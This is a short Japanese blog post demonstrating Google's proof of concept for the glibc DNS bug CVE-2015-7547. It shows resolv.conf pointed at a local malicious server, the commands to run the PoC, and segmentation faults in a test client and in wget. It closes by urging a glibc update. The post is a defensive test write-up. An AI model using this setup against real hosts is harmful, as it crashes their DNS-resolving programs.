LoginSignup
2
2

More than 5 years have passed since last update.

CVE-2015-7547 POCを動かす

Posted at

とりあえず、Googleから出されてる概念実証コード(POC)を実行してみる。

事前準備: /etc/resolv.confでネームサーバを自分に設定

nameserver 127.0.0.1

term1:

# ./CVE-2015-7547-poc.py

term2:

$ make
gcc -o CVE-2015-7547-client CVE-2015-7547-client.c
$ ./CVE-2015-7547-client
セグメンテーション違反です
$ wget http://www.google.com
--2016-02-17 16:45:49--  http://www.google.com/
www.google.com をDNSに問いあわせています... セグメンテーション違反です

あちゃー・・・ということで速めにglibcアップデートしましょう。
resolv.confを戻しておくのを忘れずに。

2
2
0

Register as a new user and use Qiita more conveniently

  1. You get articles that match your needs
  2. You can efficiently read back useful information
  3. You can use dark theme
What you can do with signing up
2
2